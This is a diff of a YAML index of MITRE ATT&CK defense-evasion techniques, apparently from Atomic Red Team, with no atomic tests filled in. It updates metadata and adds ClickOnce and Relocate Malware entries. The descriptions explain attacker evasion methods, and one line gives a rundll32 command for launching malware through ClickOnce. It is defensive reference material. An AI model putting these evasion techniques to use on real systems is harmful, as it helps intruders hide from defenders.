-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10454,11 +10599,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:24:56.148Z'
       name: 'Signed Binary Proxy Execution: Regsvr32'
       description: |-
         Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10523,12 +10667,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.010
     atomic_tests: []
   T1036.003:
     technique:
-      modified: '2023-09-14T21:12:48.411Z'
+      modified: '2024-09-12T19:30:45.065Z'
       name: 'Masquerading: Rename System Utilities'
       description: 'Adversaries may rename legitimate system utilities to try to evade
         security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10577,8 +10720,8 @@ defense-evasion:
         external_id: T1036.003
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -10593,14 +10736,13 @@ defense-evasion:
         url: https://lolbas-project.github.io/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.003
     atomic_tests: []
   T1562.011:
     technique:
-      modified: '2023-04-12T22:46:33.995Z'
+      modified: '2024-10-16T20:12:44.962Z'
       name: Spoof Security Alerting
       description: |-
         Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10612,7 +10754,7 @@ defense-evasion:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -10642,13 +10784,12 @@ defense-evasion:
         url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10709,7 +10850,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1027.003:
@@ -10765,11 +10905,10 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10793,11 +10932,10 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -10822,9 +10960,8 @@ defense-evasion:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -10904,7 +11041,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.009:
     technique:
@@ -10938,7 +11074,7 @@ defense-evasion:
       - source_name: LOLBAS Regasm
         url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
         description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:55:48.725Z'
       name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
       description: |-
         Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -10965,8 +11101,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.009
     atomic_tests: []
   T1553.004:
@@ -11061,48 +11195,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.004
     atomic_tests: []
   T1027.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
-      type: attack-pattern
-      created: '2020-03-16T15:30:57.711Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1027.004
-        url: https://attack.mitre.org/techniques/T1027/004
-      - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
-          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
-          campaign. Retrieved November 29, 2018.'
-        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
-        source_name: ClearSky MuddyWater Nov 2018
-      - source_name: TrendMicro WindowsAppMac
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
-        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
-          Info Stealer and Adware. Retrieved April 25, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-03T17:43:14.766Z'
       name: 'Obfuscated Files or Information: Compile After Delivery'
       description: |-
-        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
 
         Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor the execution file paths and command-line arguments
         for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
         suspicious behavior to reduce false positives from normal user and administrator
@@ -11111,9 +11221,14 @@ defense-evasion:
         and execution frameworks like Mono and determine if they have a legitimate
         purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
         should only be used in specific and limited cases, like for software development.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Creation'
@@ -11125,12 +11240,35 @@ defense-evasion:
       - Anti-virus
       - Binary Analysis
       - Static File Analysis
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Compiler software (either native to the system or delivered by the adversary)
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+      created: '2020-03-16T15:30:57.711Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/004
+        external_id: T1027.004
+      - source_name: ClearSky MuddyWater Nov 2018
+        description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+          campaign. Retrieved November 29, 2018.'
+        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+      - source_name: ATTACK IQ
+        description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+          (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+          Binaries. Retrieved July 15, 2024.'
+        url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+      - source_name: TrendMicro WindowsAppMac
+        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+          Info Stealer and Adware. Retrieved April 25, 2019.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1027.004
     atomic_tests: []
   T1564.007:
@@ -11178,7 +11316,7 @@ defense-evasion:
         url: https://github.com/decalage2/oletools
         description: decalage2. (2019, December 3). python-oletools. Retrieved September
           18, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T14:02:07.944Z'
       name: VBA Stomping
       description: |-
         Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11204,12 +11342,10 @@ defense-evasion:
       x_mitre_system_requirements:
       - MS Office version specified in <code>_VBA_PROJECT</code> stream must match
         host
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11299,7 +11435,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1127.001:
@@ -11357,12 +11492,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127.001
     atomic_tests: []
   T1656:
     technique:
-      modified: '2023-09-30T19:45:05.886Z'
+      modified: '2024-10-15T15:59:06.382Z'
       name: Impersonation
       description: "Adversaries may impersonate a trusted person or organization in
         order to persuade and trick a target into performing some action on their
@@ -11404,10 +11538,9 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -11431,18 +11564,30 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.005:
     technique:
-      modified: '2023-10-02T22:17:54.968Z'
+      modified: '2024-09-25T14:15:26.322Z'
       name: Modify Cloud Compute Configurations
-      description: |-
-        Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
-        For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
-        Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+      description: "Adversaries may modify settings that directly affect the size,
+        locations, and resources available to cloud compute infrastructure in order
+        to evade defenses. These settings may include service quotas, subscription
+        associations, tenant-wide policies, or other configurations that impact available
+        compute. Such modifications may allow adversaries to abuse the victim’s compute
+        resources to achieve their goals, potentially without affecting the execution
+        of running instances and/or revealing their activities to the victim.\n\nFor
+        example, cloud providers often limit customer usage of compute resources via
+        quotas. Customers may request adjustments to these quotas to support increased
+        computing needs, though these adjustments may require approval from the cloud
+        provider. Adversaries who compromise a cloud environment may similarly request
+        quota adjustments in order to support their activities, such as enabling additional
+        [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+        suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+        2023) Adversaries may also increase allowed resource usage by modifying any
+        tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+        Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+        where cloud resources can be deployed, such as enabling [Unused/Unsupported
+        Cloud Regions](https://attack.mitre.org/techniques/T1535). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -11456,7 +11601,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       type: attack-pattern
@@ -11468,20 +11613,11 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1578/005
         external_id: T1578.005
-      - source_name: Microsoft Subscription Hijacking 2022
-        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
-          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
-        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
       - source_name: Microsoft Cryptojacking 2023
         description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
           Understanding and defending against cloud compute resource abuse. Retrieved
           September 5, 2023.'
         url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
-      - source_name: Microsoft Peach Sandstorm 2023
-        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
-          password spray campaigns enable intelligence collection at high-value targets.
-          Retrieved September 18, 2023.
-        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
       - source_name: Microsoft Azure Policy
         description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
           Retrieved September 5, 2023.
@@ -11490,11 +11626,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.008:
     technique:
-      modified: '2024-04-12T21:13:56.431Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Impair Defenses: Disable Cloud Logs'
       description: |-
         An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -11503,6 +11638,7 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -11512,6 +11648,7 @@ defense-evasion:
       - Janantha Marasinghe
       - Matt Snyder, VMware
       - Joe Gumke, U.S. Bank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
         for: <code>StopLogging</code> and <code>DeleteTrail</code>.(Citation: Stopping
@@ -11523,13 +11660,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      - Office 365
-      x_mitre_version: '2.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'User Account: User Account Modification'
@@ -11574,9 +11711,6 @@ defense-evasion:
         url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.008
     atomic_tests: []
   T1564.003:
@@ -11659,18 +11793,140 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.003
     atomic_tests: []
+  T1127.002:
+    technique:
+      modified: '2024-10-17T18:50:41.474Z'
+      name: ClickOnce
+      description: |-
+        Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+        Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+        ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+        Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+        Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Wirapong Petshagun
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Metadata'
+      - 'Module: Module Load'
+      x_mitre_system_requirements:
+      - ".NET Framework"
+      type: attack-pattern
+      id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+      created: '2024-09-09T14:39:28.637Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1127/002
+        external_id: T1127.002
+      - source_name: LOLBAS /Dfsvc.exe
+        description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+      - source_name: Microsoft Learn ClickOnce
+        description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+          Retrieved September 9, 2024.
+        url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+      - source_name: SpectorOps Medium ClickOnce
+        description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+          (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+        url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+      - source_name: NetSPI ClickOnce
+        description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+          Love Story. Retrieved September 9, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+      - source_name: Burke/CISA ClickOnce Paper
+        description: William J. Burke IV. (n.d.). Appref-ms Abuse for  Code Execution
+          & C2. Retrieved September 9, 2024.
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+      - source_name: Burke/CISA ClickOnce BlackHat
+        description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+          IN: When .appref-ms abuse is operating as intended. Retrieved September
+          9, 2024.'
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1070.010:
+    technique:
+      modified: '2024-10-13T15:48:46.391Z'
+      name: Relocate Malware
+      description: |-
+        Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+        Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+        Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Matt Anderson, @‌nosecurething, Huntress
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+      created: '2024-05-31T11:07:57.406Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/010
+        external_id: T1070.010
+      - source_name: Latrodectus APR 2024
+        description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+          (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+          31, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+      - source_name: DFIR Report Trickbot June 2023
+        description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+          Retrieved May 31, 2024.
+        url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
